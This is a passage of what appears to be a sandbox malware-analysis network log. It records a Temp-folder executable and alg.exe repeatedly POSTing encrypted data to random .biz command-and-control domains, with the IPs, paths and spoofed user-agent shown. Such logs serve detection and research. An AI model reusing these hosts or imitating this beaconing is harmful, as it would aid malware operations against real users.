User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:25.172878981 CEST | 778 | OUT | Data Raw: 83 51 c8 e9 66 00 f3 0c fe 02 00 00 4e 31 3a 24 45 34 e4 02 04 f2 76 85 cf dc 30 e2 73 65 ae 77 9f 61 6d 2c 1f 2d dc 9b 3c a7 b1 f2 fa bd be 9b 06 46 f2 6e bd f8 00 f0 61 69 b3 5e 42 a5 08 47 b4 6d 8c 17 d1 64 ac 81 d7 0b 99 1f 39 54 a5 92 e2 8b
Data Ascii: QfN1:$E4v0sewam,-<Fnai^BGmd9TH,")S7R`49SH/FI$w$[m_"6VK\p?r-mt|<iDi6L^4t(lplj&w s?nEvb%?\zp
Oct 10, 2024 10:07:25.895824909 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:07:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0c9075829c940128493346420bafe6e6|8.46.123.33|1728547645|1728547645|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49709 | 54.244.188.177 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:26.811873913 CEST | 345 | OUT | POST /agup HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:07:26.811894894 CEST | 828 | OUT | Data Raw: 07 56 a2 c2 4a 26 a5 9d 30 03 00 00 79 eb a1 e5 22 08 04 6b dc 02 a3 0c db ca 8c 0e e3 67 ca 27 f0 80 37 bc 06 cf 89 82 c1 27 ec d9 a9 df 67 24 9c c5 9b 56 e5 aa af cd 12 ed 23 2b 2d 7c a0 b5 b6 7f c4 e7 ca f7 95 e1 14 75 f9 de 0e 35 e4 ae d6 9b
Data Ascii: VJ&0y"kg'7'g$V#+-|u57&$1iGR-*F5N)W2n\_j)BWE'H?JHn^*\b%8}L(JLbrR*O'Fx2e0/+<%9tE
Oct 10, 2024 10:07:27.530631065 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:07:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5d13570c70bdadfc0a49b3682ea1805c|8.46.123.33|1728547647|1728547647|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.5  49710        18.141.10.107   80                7120  C:\Windows\System32\alg.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:07:26.815845013 CEST  358                OUT        POST /acnwjlbaxboknfa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:07:26.815876007 CEST  778                OUT        Data Raw: 52 be ff a1 ba e1 c6 f8 fe 02 00 00 8a 7a 8d d9 3d 56 a3 aa ca 1d a1 d9 2e 2e 92 98 9a bd 7b fe ab 8f 82 b6 36 91 11 ee 32 1a e7 5b 84 01 65 75 8b 40 ba 82 17 a5 f3 1e 4c 08 cc 37 c9 8e 5a ac 9b fc 9e e7 67 0c bf 29 b8 96 98 b8 24 20 6d 9d bb 59
    Data Ascii: Rz=V..{62[eu@L7Zg)$ mY<Z<IpJvyW~&*7<Y?dv)Zw9h D0]R W|L/6NJ!#iDHa3E7rGyLb"2IRB4wFkP1X9m
Oct 10, 2024 10:07:28.142940998 CEST  409                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:07:27 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c58366d52b7d28f011baa997422ed616|8.46.123.33|1728547647|1728547647|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
5           192.168.2.5  49711        44.221.84.105   80                576  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:07:27.834861994 CEST  358                OUT        POST /dwqgybxwikykky HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:07:27.834960938 CEST  828                OUT        Data Raw: fd 13 10 09 42 5c 30 fe 30 03 00 00 46 40 a8 47 de 31 db 08 e6 52 c6 43 6c d1 19 1c 38 85 b2 76 30 32 f3 86 bf 70 e5 18 76 21 6a 10 08 6c be 67 3d 57 79 bd f5 64 19 67 a4 79 86 18 37 d6 9d 10 9f 91 3e 79 2e f1 3c 3c 9d f7 da 21 2e 55 b1 1f 9e f7
    Data Ascii: B\00F@G1RCl8v02pv!jlg=Wydgy7>y.<<!.Uq}j/=N}TD[-!b{|fru^/5^,*m]ztxKgc!Jj7g"MlYi^Wu4hL4S+oL:k\]o(
Oct 10, 2024 10:07:28.282351971 CEST  410                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:07:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=52cc2f51b8270fcf915ed9941f3459bb|8.46.123.33|1728547648|1728547648|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.5  49713        54.244.188.177  80                7120  C:\Windows\System32\alg.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:07:28.321480036 CEST  356                OUT        POST /mvgpsfdcrvitryo HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:07:28.321497917 CEST  778                OUT        Data Raw: 0c 22 db b2 5d 39 bc e0 fe 02 00 00 75 2b be de a1 85 a5 30 d8 3d 70 d6 df 07 36 99 6e e0 20 9a f9 b2 ce 70 1c 76 67 11 4b ba c0 29 ab 50 34 4d e0 50 a2 7b e4 3d ba 65 77 eb da d3 94 3c ff 95 65 28 20 1b dc 74 ec 6c 2d cb a7 8a 7c d2 35 9b 78 64
    Data Ascii: "]9u+0=p6n pvgK)P4MP{=ew<e( tl-|5xdx$c!>.!>F_T`rNpo@0fF;tJyR'g=ELcjHI]DgD8z"|w7Mujd*2`C
Oct 10, 2024 10:07:29.063055038 CEST  407                IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:07:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=f300bac6f9c3406740cc32f31af58ffb|8.46.123.33|1728547648|1728547648|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
7           192.168.2.5  49714        172.234.222.143  80                576  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:07:28.387974977 CEST  347                OUT        POST /rrba HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:07:28.388010979 CEST  828                OUT        Data Raw: 47 0e c3 77 0e a0 98 9a 30 03 00 00 f7 90 12 20 62 73 4d 32 ce c2 90 2f 0c 63 b9 9e 22 5c 94 05 99 eb e2 8d db ab 0b d0 bf 51 88 86 d9 4f c2 7e c6 f0 f3 ce 02 5d 80 ef 09 4e ce 89 d3 8d 4d 2f bf 5c 51 cb f0 c5 b7 64 84 cd c8 92 f0 50 95 9e 10 72
    Data Ascii: Gw0 bsM2/c"\QO~]NM/\QdPr\nbCO3I(7@^x:NVv3mGBr{qAe*;pU>(P$R|Bh,!<{MX<ABr=.c_5xv%\p VOuKK


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
8           192.168.2.5  49715        172.234.222.143  80                576  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:07:28.931571960 CEST  353                OUT        POST /ajvaopkagn HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:07:28.931637049 CEST  828                OUT        Data Raw: a9 8b 62 57 36 cf 15 06 30 03 00 00 01 f0 54 41 51 2f 68 38 ec 18 8d df f0 f5 60 22 d3 52 08 98 49 b6 5e 73 15 fc 52 ea 98 0d b1 52 d4 c5 19 3b a0 56 da eb fc 9f f9 f6 e8 ff d4 9a bf ed ef e3 14 93 51 86 82 04 d2 84 0f 56 c2 43 70 43 9a e4 d9 12
    Data Ascii: bW60TAQ/h8`"RI^sRR;VQVCpCMCZqc`-uw^!q;D.dNM_$X[W0t%^(naJD*S96qgI)h9X`$,|3v+JhZS4du@#&


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49716 | 44.221.84.105 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:29.393501043 CEST | 360 | OUT | POST /ojwgmwlrsgrxkodi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:29.393501043 CEST | 778 | OUT | Data Raw: c9 60 bb 76 4c 65 3b 89 fe 02 00 00 78 f0 6e 27 4b b0 ec d6 75 ee b2 57 af a7 14 6e 98 90 f1 80 f9 54 d4 24 e9 68 e2 5a 09 8c b3 2d eb b0 60 e9 65 98 80 be 0e 77 bf 83 d0 d6 05 50 c1 70 1a 09 dc 7e 9c ce a2 21 5d 89 77 c7 5d 88 c1 60 5a 6a c2 f9
Data Ascii: `vLe;xn'KuWnT$hZ-`ewPp~!]w]`ZjpWZ}5YW7rV<U/J"%u--!ZE/oAyQFXO0jS9^e9v/NhPj!KOPY24{7<^a*qD$
Oct 10, 2024 10:07:29.860227108 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:07:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fd17a0a843249f8e16f516f1c06ae80b|8.46.123.33|1728547649|1728547649|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49717 | 18.141.10.107 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:29.574687004 CEST | 355 | OUT | POST /xecqerkyvkn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:07:29.575304985 CEST | 828 | OUT | Data Raw: 6e 5a 8b 48 92 e4 4c 2b 30 03 00 00 54 3a c4 d9 66 c9 54 49 5d 4a 6a 39 b2 3e 16 3e 28 60 21 0f ed 67 c3 a1 2d 3d db db 19 90 db 44 3d 32 34 1a 6e 46 67 3d 36 78 3a ee 6d 93 cf 4f 70 53 f3 17 c2 a4 8a c5 a1 a3 2c 79 4e bb c7 88 54 af 9e d8 21 d3
Data Ascii: nZHL+0T:fTI]Jj9>>(`!g-=D=24nFg=6x:mOpS,yNT!"Hkc(;p'H6!{4F03ap"M:aDGmNExz{8sJ)5/Ur)G5QjpEWie)3lBFb
Oct 10, 2024 10:07:30.899318933 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:07:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cbb900c6d08a3126e7a3d74dfa0f321d|8.46.123.33|1728547650|1728547650|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49718 | 172.234.222.143 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:30.392519951 CEST | 356 | OUT | POST /ysrvxblocwefk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:30.392565012 CEST | 778 | OUT | Data Raw: d5 f2 41 13 4e b9 90 77 fe 02 00 00 bd 4f 3c d1 91 a9 e4 59 bf 4d 06 50 a5 ca 08 28 17 29 57 cd 04 d5 8c 5a 74 21 02 8e 51 22 14 52 8b 7a 92 59 39 9c 25 93 39 0d f5 f7 ed 91 42 ea 1a 63 37 0c 01 dc 0e 68 59 59 28 cb 3e 7c e8 a1 0c 6b 48 4b ef 8a
Data Ascii: ANwO<YMP()WZt!Q"RzY9%9Bc7hYY(>|kHKdzXNEorV4SyrA8>EiBB<l,|L@20pXH=//m=QCxs`rT`q8HA\u9/G07y:%oVzqD]%HqTeOth


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49720 | 82.112.184.197 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:30.959697962 CEST | 354 | OUT | POST /xkjanqfjaocn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:07:30.959739923 CEST | 828 | OUT | Data Raw: fb 36 5e cb 87 38 ab 30 30 03 00 00 51 0d 94 fd f6 22 73 45 37 0d 78 fa d7 82 4a f3 b1 7a c5 dc 4f 25 32 39 2e 53 f0 29 2f bf f9 28 c1 13 76 87 52 34 1f 93 70 0a b0 41 c2 ac 02 b9 66 56 45 5d 53 a0 25 6b e2 ee 37 00 70 6e bc 25 ca 7e 24 bb b0 8f
Data Ascii: 6^800Q"sE7xJzO%29.S)/(vR4pAfVE]S%k7pn%~$g(u_hjW]n#I%0ol_cTp3FI8$g\.I@pA @K3`uQ-rX,sfaG5h1s}'p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49721 | 172.234.222.143 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:31.021984100 CEST | 344 | OUT | POST /w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:31.022017002 CEST | 778 | OUT | Data Raw: 00 c2 72 f0 7a bd 7f 09 fe 02 00 00 20 58 60 02 8f 7b 95 d6 4e 18 36 42 7e 37 e0 a1 9a 3a a1 a3 1f b2 09 2d bd 69 3d 1e 7a 5d a2 f8 e2 f3 eb 1f 38 94 91 46 33 5e 09 a4 b9 c2 13 70 af cf 6c fa dd c6 c1 5c 7d e1 8e e8 72 37 9c eb 5f 76 3b d9 c0 d4
Data Ascii: rz X`{N6B~7:-i=z]8F3^pl\}r7_v;NMV?-yn2RV)in.C9;kc{.T{,r\[.6Lz30-Cu"Gz<5/X;#$9}DgQ]pG<H!~ynws5B&


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49724 | 18.141.10.107 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:31.687979937 CEST | 360 | OUT | POST /xylpjhgrvuhkfdao HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:31.688024044 CEST | 778 | OUT | Data Raw: a9 f3 bf 0c 03 b6 48 3f fe 02 00 00 b6 cf fb cb 01 5c 4e 25 88 9b 25 ae 20 71 76 70 23 69 e9 a9 8a 76 71 5b 32 b8 50 63 1e 0f 9a 80 98 3c a6 06 58 89 ec b8 d9 cf bd c1 36 a1 55 53 36 5e 09 3a e2 b2 eb f9 aa 21 cf 8b 7c 94 a1 8d 21 e1 4b 7b 0b 6d
Data Ascii: H?\N%% qvp#ivq[2Pc<X6US6^:!|!K{mTi2,:rWxQ7H"dxM%9oUq_x8t"mj'%h[v!b.(@U0TOtUmF*CvNG
Oct 10, 2024 10:07:33.038400888 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:07:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=677bd58630d34250e089e5bce9cba3cf|8.46.123.33|1728547652|1728547652|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49735 | 82.112.184.197 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:33.498348951 CEST | 345 | OUT | POST /mgu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:33.498348951 CEST | 778 | OUT | Data Raw: 30 29 9e 51 75 03 54 9f fe 02 00 00 93 92 a6 aa b6 f9 1d 40 77 a9 3b b5 3e 35 78 44 f8 3e 0c 17 07 d0 bc 06 19 e1 7b 3b 89 3f 21 55 03 ed 06 3a 54 1f 40 54 81 7d bb ab 4c 23 ca 68 ed 3c 03 1f bf 6d 57 29 17 2c c8 69 3f 2e 50 6c 1f 20 d6 c1 51 84
Data Ascii: 0)QuT@w;>5xD>{;?!U:T@T}L#h<mW),i?.Pl Q>Wcdw+G^j wn8@Y0}i\=T+VU6E5_d+')Q44'uL&gNJ&?/gl)T0s1*yHOE&T3!k7w1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49771 | 82.112.184.197 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:39.578125954 CEST | 355 | OUT | POST /pkabvaplwbiqx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:07:39.578151941 CEST | 828 | OUT | Data Raw: 6c 39 52 fc cf d1 87 a5 30 03 00 00 bc 57 2c e9 3d 1f 74 57 85 f7 b2 6f de e8 15 13 ea dc 2a d8 ea ed ab 65 b0 80 a3 26 2d a1 a1 e2 84 77 7a 72 e4 4c b3 24 f5 53 56 68 6e 72 79 f7 78 bc 4d fc df 88 ff 22 5e 03 7f 73 a9 c1 37 8d ae 04 bd 55 e4 e3
Data Ascii: l9R0W,=tWo*e&-wzrL$SVhnryxM"^s7U*uZsI,Of=NL"zGL.qimIT71p]Z :k#puH%%;wkNFi-E{z!K R7f1ibz~-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49869 | 82.112.184.197 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:54.912334919 CEST | 348 | OUT | POST /dmaeaf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:54.912357092 CEST | 778 | OUT | Data Raw: 55 35 3c a3 a9 db a8 88 fe 02 00 00 91 1d 7c 88 c6 a9 e9 02 c1 f5 11 4d 0b 6e 4b df a5 0a c0 0b fd 63 0c 1c 7e c6 1b 25 52 2d 25 b0 78 58 9e 19 6d 0a c7 32 2b 01 9b 6b a5 9b 27 6b 77 40 8c d7 83 a8 77 29 46 4a 7f 26 c5 31 28 bf d4 9f 0f 85 8b a0
Data Ascii: U5<|MnKc~%R-%xXm2+k'kw@w)FJ&1(19nmS>@ym{JlFwBX;vX95:!4Kt{"Z(m6[;V=;zFz%a,mF2zZ,xf#3[i5p6~< t


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49882 | 82.112.184.197 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:57.014811993 CEST | 355 | OUT | POST /vpujdohccl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:07:57.014832020 CEST | 778 | OUT | Data Raw: 53 3b 28 e5 cd ab 80 20 fe 02 00 00 c2 b0 08 49 57 9f 03 b8 a6 de d7 2b 81 21 fa c5 a9 98 19 53 21 c2 2f 02 06 5f 24 d9 01 cf a2 d9 03 56 ba 81 46 82 45 a4 37 28 dc 9a b5 9a 94 e3 92 be 13 82 65 9c 67 94 3a b4 23 a5 99 87 17 4a 9f e2 83 51 95 53
Data Ascii: S;( IW+!S!/_$VFE7(eg:#JQS<g>^fDn*mm$>&BW`-:Ei`Q3-V{U|1s2czt]RKFGfr+{=(H/.]nP#3'zg7[NhI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49905 | 82.112.184.197 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:01.009949923 CEST | 357 | OUT | POST /gocchgnxicko HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:01.009949923 CEST | 778 | OUT | Data Raw: db 5a b9 36 67 8c e1 c2 fe 02 00 00 a7 4b ad f5 c3 9c 09 8c b8 71 93 de ea 0a 72 bc 0a 25 e6 18 fc 05 d0 b4 75 31 ce 95 33 51 7c 2d 54 f0 ec 44 a5 3e ca 67 30 51 25 0c 21 eb 62 92 6e 65 38 b2 d7 87 93 d6 9e ef 0f af 2c 19 ff 85 10 d5 48 a4 40 59
Data Ascii: Z6gKqr%u13Q|-TD>g0Q%!bne8,H@YNr\'J@4.#ct$qrF}y_QY0N)OyLRfn$1m7W[+TlDOe$:v;9CtYwu#fbM}rdMto5N


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49906 | 82.112.184.197 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:01.041970968 CEST | 358 | OUT | POST /mnoqnjatopaha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
